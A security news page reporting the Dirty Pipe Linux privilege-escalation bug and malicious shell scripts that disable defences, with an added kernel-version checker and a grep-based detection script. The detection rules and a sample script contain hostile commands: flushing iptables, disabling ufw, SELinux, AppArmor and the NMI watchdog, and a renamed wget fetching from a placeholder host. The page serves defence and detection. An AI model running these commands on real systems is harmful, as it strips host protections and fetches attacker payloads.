
'Dirty Pipe' Kernel Bug Enabling Root Is Patched by Linux Distros


Dirty Pipe is a Linux local privilege escalation vulnerability that has been discovered and publicly disclosed, together with a proof-of-concept exploit. The flaw was responsibly disclosed by security researcher Max Kellermann, who states that it affects Linux kernel 5.8 and later, as well as Android devices.

CVE-2022-0847 is a weakness in the Linux kernel that was introduced in version 5.8 and resolved in versions 5.16.11, 5.15.25, and 5.10.102.

Kellermann discovered the flaw while investigating a bug that was corrupting the web server access logs of one of his customers. According to Kellermann, the vulnerability is similar to Dirty COW (CVE-2016-5195), which was fixed in 2016.

Thanks to a refactoring error in the kernel's pipe handling code, an unprivileged user program can overwrite data in the page cache, and that data ultimately makes its way into the file on disk. The effect is the same as Dirty COW, but the bug is considerably easier to exploit.

If you use Linux, check for and install security updates from your distribution. If you use Android, wait for Google (and possibly your device maker and/or carrier) to ship an update; the current Android builds for the Google Pixel 6 and the Samsung Galaxy S22 run a kernel from the affected 5.8-or-later range and are currently at risk.
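A quick first triage of the running kernel against the version range stated above, as an added example that is not part of the original post. It treats versions after 5.16 as fixed because the mainline fix predates 5.17 (my assumption beyond the post), and the output only tells you where to look next, since distributions backport fixes without changing the version string.

```shell
#!/bin/sh
# Added example (not from the post): classify a kernel version string against the
# Dirty Pipe (CVE-2022-0847) range given above: introduced in 5.8, fixed in 5.16.11,
# 5.15.25 and 5.10.102. Prints affected|fixed|unaffected|unknown.
# Caveat: "affected" means "check your distro's advisory for CVE-2022-0847",
# not "exploitable", because backported fixes do not change the version string.
dirty_pipe_status() {
  ver=$(printf '%s\n' "$1" | sed 's/[^0-9.].*//')   # 5.10.102-generic -> 5.10.102
  maj=$(printf '%s\n' "$ver" | cut -s -d. -f1)
  min=$(printf '%s\n' "$ver" | cut -s -d. -f2)
  pat=$(printf '%s\n' "$ver" | cut -s -d. -f3)
  pat=${pat:-0}
  if [ -z "$maj" ] || [ -z "$min" ]; then echo unknown; return 0; fi
  # the buggy code was introduced in 5.8, so older kernels never had it
  if [ "$maj" -lt 5 ] || { [ "$maj" -eq 5 ] && [ "$min" -lt 8 ]; }; then
    echo unaffected; return 0
  fi
  # series newer than 5.16 already carry the mainline fix (assumption, see lead-in)
  if [ "$maj" -gt 5 ] || [ "$min" -gt 16 ]; then echo fixed; return 0; fi
  # stable series named in the post and their first fixed patch level
  case "$maj.$min" in
    5.10) fixed=102 ;;
    5.15) fixed=25 ;;
    5.16) fixed=11 ;;
    *)    fixed="" ;;   # 5.8-5.9 and 5.11-5.14: no fixed release named
  esac
  if [ -n "$fixed" ] && [ "$pat" -ge "$fixed" ]; then echo fixed; else echo affected; fi
}

dirty_pipe_status "$(uname -r)"
```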

As part of the Dirty Pipe disclosure, Kellermann released a proof-of-concept (PoC) exploit that lets a user inject their own content into sensitive read-only files, removing restrictions or modifying settings to gain wider access than they would normally have.

Security researcher BLASTY then released an improved exploit today that makes gaining root privileges easier: it alters the /usr/bin/su binary to drop a root shell at /tmp/sh and then invokes that shell.

The vulnerability was responsibly disclosed to several Linux maintainers, including the Linux kernel security team and the Android Security Team, starting on February 20th, 2022. Although the flaw has been fixed in Linux kernels 5.16.11, 5.15.25, and 5.10.102, many servers still run outdated kernels, which makes the public release of this exploit a major concern for server admins.

Furthermore, given how easily these exploits yield root access, it is only a matter of time before threat actors start using the vulnerability in attacks. Malware has previously used the comparable Dirty COW vulnerability, which was harder to exploit.

This flaw is particularly concerning for web hosting companies that provide Linux shell access, as well as universities that often provide shell access to multi-user Linux systems. It has been a difficult year for Linux, with a series of high-profile privilege-escalation flaws disclosed.

Malicious Linux Shell Scripts Used to Evade Defenses


Attackers' evasion methods date back to the days when base64 and other common encoding schemes were used.

Today, attackers use new Linux shell script methods and techniques to disable firewalls and monitoring agents and to change access control lists (ACLs). The common evasive shell-script techniques are:

1. Uninstalling monitoring agents
Monitoring agents are software components that regularly track a system's process and network activity. They also produce various logs, which are useful during an incident investigation.

The malicious script, discovered in an osquery-based sandbox, attempts to uninstall the cloud monitoring agent Aegis (Alibaba Cloud's threat detection agent) and stop the Aliyun service. It also tries to uninstall YunJing, a host security agent from Tencent, and the BCM client management agent, which is commonly installed on endpoints for risk mitigation.

2. Disabling firewalls and interrupts
Most systems and servers use a firewall as a defensive measure. As a defense evasion technique, the malware attempts to disable the firewall, i.e., the Uncomplicated Firewall (ufw). Attackers also flush the iptables rules (iptables -F); iptables is commonly used on Linux desktops and servers to manage firewall rules.

Attackers also use commands to disable the non-maskable interrupt (NMI) watchdog. The watchdog is a configurable timer that raises an interrupt when a given condition persists for a set time; if the system freezes, the NMI watchdog's interrupt handler kills the process that caused the freeze. To get past this defense, attackers disable the watchdog through the sysctl command, or turn it off temporarily by setting its value to '0'.

3. Disabling Linux Security Modules (LSMs)
The malicious shell script also disables security components such as SELinux and AppArmor. These modules enforce mandatory access control (MAC) policies, and a server administrator can easily configure them to give users restricted access to the programs installed or running on the system.

- AppArmor: AppArmor is a Linux security feature that lets users confine applications such as Firefox for added protection. In Ubuntu's default setup, a user can restrict a program by granting it limited permissions.

- SELinux: SELinux is a Linux security feature that lets a security administrator assign security contexts to particular applications and services. Because it blocks or restricts the shell on many web servers, attackers who achieve remote code execution (RCE) usually try to bypass or disable it.

4. Modifying ACLs
Access Control Lists (ACLs) hold the rules for granting permissions on files and utilities. Filesystem ACLs tell the operating system which users are allowed to access an object and what rights they hold. On Linux, the setfacl program is used to modify and remove ACLs.

5. Changing attributes
On Linux, chattr is used to set and clear various attributes of a file. Attackers use it to protect their own dropped files, or to make those files permanent so that a user cannot delete them.

6. Renaming common utilities
In one of the malicious scripts, common utilities such as wget and curl were used under different names. These programs are commonly used to fetch files from a remote address, and attackers use them to download malicious files from their command-and-control (C2) servers.

If wget and curl run under different names, security products that match on the exact utility names may never raise a download event.
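The six techniques above map naturally onto a static scan of a script before it is allowed to run. The following added example (my own code, not from the post or from Uptycs) greps a script for each technique and reports the matching lines; the rule patterns, labels and the sample script are constructed for the demonstration, and the agent names and paths should be widened to match your own environment.

```shell
#!/bin/sh
# Added example (not from the post): flag lines of a shell script that match the six
# evasion techniques listed above. Rules, labels and the sample are my own construction.

# one rule per line: <extended regex>;<label>
RULES='(aegis|yunjing|aliyun|bcm).*uninstall|(uninstall|stop|kill).*(aegis|yunjing|aliyun|bcm);1 uninstall monitoring agent
ufw[[:space:]]+disable|iptables[[:space:]]+-F;2 disable firewall
nmi_watchdog[[:space:]]*=[[:space:]]*0;2 disable NMI watchdog
setenforce[[:space:]]+0|(stop|disable|teardown)[[:space:]]+apparmor|aa-teardown;3 disable LSM
setfacl[[:space:]]+-;4 modify ACL
chattr[[:space:]]+[+-];5 change attributes
(cp|mv|ln)[[:space:]]+.*/(wget|curl)[[:space:]]+;6 renamed download utility'

# scan_script FILE: prints "<label>: <line-no>:<line>" for every matching line
scan_script() {
  printf '%s\n' "$RULES" | while IFS=';' read -r pat label; do
    grep -Ein "$pat" "$1" | sed "s/^/$label: /"
  done
}

# constructed sample that exercises every rule; it is scanned, never executed
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
#!/bin/bash
/usr/local/aegis/uninstall.sh
ufw disable
iptables -F
sysctl -w kernel.nmi_watchdog=0
setenforce 0
systemctl stop apparmor
setfacl -m u:guest:rwx /opt/app
chattr +i /tmp/.x
cp /usr/bin/wget /tmp/.w && /tmp/.w http://example.invalid/x
echo "benign line"
EOF

scan_script "$SAMPLE"
```

Matching is case-insensitive and line-based, so a script that assembles command names from variables or base64 blobs will slip past it; this is a triage aid to pair with the process-level EDR detection described next, not a replacement for it.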

EDR Detections by Uptycs
Uptycs EDR flagged these malicious scripts with a threat score of 10/10 using YARA process scanning.

As attackers adopt newer and more complex evasion techniques, it is more important than ever to track and record what is happening on the system. According to Threatpost, the following measures are recommended:

- Regularly monitor suspicious processes, events, and network traffic resulting from the execution of any untrusted binary.
- Keep your systems and firmware up to date with the latest fixes and releases.